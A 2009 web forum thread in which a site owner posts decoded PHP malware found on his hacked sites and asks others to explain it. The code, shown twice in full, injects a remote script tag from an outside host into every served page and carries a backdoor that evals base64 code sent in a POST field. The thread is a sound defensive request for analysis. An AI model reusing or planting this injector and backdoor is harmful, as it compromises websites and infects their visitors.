Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> PHP
Author Message
eldorado
Involved
Involved



Joined: Sep 10, 2008
Posts: 424
Location: France,Translator

PostPosted: Fri Nov 06, 2009 5:30 pm Reply with quote

Good evening ... I ran into a virus last thursday and i was wondering if you guys could validates my explanation.
That code you see was decoded from base64. [ Only registered users can see links on this board! Get registered or login! ]
I voluntary left the two base64 undecoded , but it's leading to some script at http:[slash][slash]zangmusic[dot]com/images/zang-sullivanroom-22nov08pt2[dot]php , probably another iframed virus...wouldn't want to check

Code:
if(!function_exists('jruq')){

   function jruq($s){
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))
foreach($a[0]as$v)if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
}

if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))
foreach($a[0]as$v)
if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))
$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);

$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3phbmdtdXNpYy5jb20vaW1hZ2VzL3phbmctc3VsbGl2YW5yb29tLTIybm92MDhwdDIucGhwID48L3NjcmlwdD4='),'',$s);
if(stristr($s,'<body'))
$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);
elseif(strpos($s,'<a'))$s=$a.$s;return$s;}
function jruq2($a,$b,$c,$d){
global$jruq1;
$s=array();
if(function_exists($jruq1))call_user_func($jruq1,$a,$b,$c,$d);
foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='jruq')return;
elseif($a=='ob_gzhandler')break;
else
$s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();
ob_end_clean();}ob_start('jruq');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);
echo $s[$i][1];}}}$jruql=(($a=@set_error_handler('jruq2'))!='jruq2')?$a:0;
eval(base64_decode($_POST['e']));

if(!function_exists('jruq')){
function jruq($s){
if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){
$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
}

if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3phbmdtdXNpYy5jb20vaW1hZ2VzL3phbmctc3VsbGl2YW5yb29tLTIybm92MDhwdDIucGhwID48L3NjcmlwdD4='),'',$s);
if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);
elseif(strpos($s,'<a'))$s=$a.$s;
return$s;
}
function jruq2($a,$b,$c,$d){
global$jruq1;
$s=array();
if(function_exists($jruq1))call_user_func($jruq1,$a,$b,$c,$d);
foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='jruq')return;
elseif($a=='ob_gzhandler')break;
else$s[]=array($a=='default output handler'?false:$a);
for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();
ob_end_clean();
}ob_start('jruq');
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}
$jruql=(($a=@set_error_handler('jruq2'))!='jruq2')?$a:0;eval(base64_decode($_POST['e']));


I'm understanding of this script is that it replaces all the </body> stuff to </body>some scripts of every file it's running into .My understanding is very limited and I could need some light over here. Not only some of my members ran into this when they logged on 2 days ago , now its my RN2.4 sites and some e107 sites.
thank you Smile

_________________
United-holy-dragons.net (My RN site)- Rejekz(cod4 clan) - gamerslounge 
View user's profile Send private message Visit poster's website MSN Messenger
eldorado







PostPosted: Mon Nov 09, 2009 4:53 pm Reply with quote

*Bump* still need help..
 
Palbin
Site Admin



Joined: Mar 30, 2006
Posts: 2583
Location: Pittsburgh, Pennsylvania

PostPosted: Mon Nov 09, 2009 6:09 pm Reply with quote

eldorado, what exactly are you asking? Obviously it appears to be a malicious script, but how did you come across it? How did you come to be there?

If it was uploaded to your site you need to find your access logs to see how it was done. If it was uploaded to your site there is not much we can do without know how it was done.

_________________
"Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it." — Brian W. Kernighan. 
View user's profile Send private message
evaders99
Former Moderator in Good Standing



Joined: Apr 30, 2004
Posts: 3221

PostPosted: Tue Nov 10, 2009 12:08 am Reply with quote

Pretty standard obfuscation - doesn't seem to do anything unless you know what is passed into
$_POST['e']

_________________
- Star Wars Rebellion Network -

Need help? Nuke Patched Core, Coding Services, Webmaster Services 
View user's profile Send private message Visit poster's website
eldorado







PostPosted: Tue Nov 10, 2009 1:54 am Reply with quote

Palbin wrote:
eldorado, what exactly are you asking? Obviously it appears to be a malicious script, but how did you come across it? How did you come to be there?

Well for some obscure reason , my e107 site from which originated the attack doesn't provide ftp logs.So that'd be an issue. However the rn2.4 got "hacked" because I was infected during my stay on the e107 one. It used my saved password on filezilla to get into my [ Only registered users can see links on this board! Get registered or login! ] got rid of the trojan)

But the question is , what exactly is it doing? I know malicious scripts should be deleted immediately but I need to know where they are first , hence my question.
 
Palbin







PostPosted: Tue Nov 10, 2009 6:40 am Reply with quote

Ah. I will have to differ to evaders99 then Smile
 
eldorado







PostPosted: Tue Nov 10, 2009 11:32 am Reply with quote

evaders99 wrote:
Pretty standard obfuscation - doesn't seem to do anything unless you know what is passed into
$_POST['e']


ok , so basicly it's just Myurl.com/thefile.php?e="somebase64" , so no way to know what it does , unless you know what was posted.. that is pretty obscure for me:( And really annoying.
 
evaders99







PostPosted: Tue Nov 10, 2009 8:14 pm Reply with quote

yep pretty much
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> PHP

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©